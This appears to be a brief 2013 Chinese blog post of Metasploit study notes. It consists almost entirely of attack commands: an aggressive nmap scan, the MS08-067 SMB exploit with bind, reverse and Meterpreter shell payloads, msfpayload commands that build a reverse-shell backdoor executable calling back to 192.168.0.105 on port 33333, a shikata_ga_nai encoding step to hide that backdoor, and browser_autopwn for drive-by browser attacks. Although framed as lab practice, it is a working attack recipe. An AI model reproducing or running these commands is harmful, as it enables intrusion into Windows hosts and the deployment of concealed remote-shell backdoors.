metasploit study

load db_tracker
db_nmap -T Aggressive -sV -n -O -v 192.168.0.107


绑定shell
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp

反弹shell
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp

Meterpreter方式
set PAYLOAD windows/meterpreter/reverse_tcp

生成后门
/msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 O
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 X > /root/server.exe 


加密后门
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 R | ./msfencode -e x86/shikata_ga_nai -t exe > /root/server1.exe


自动化浏览器攻击
use auxiliary/server/browser_autopwn

posted @ 2013-09-23 16:13  山貓  阅读(248)  评论(0编辑  收藏  举报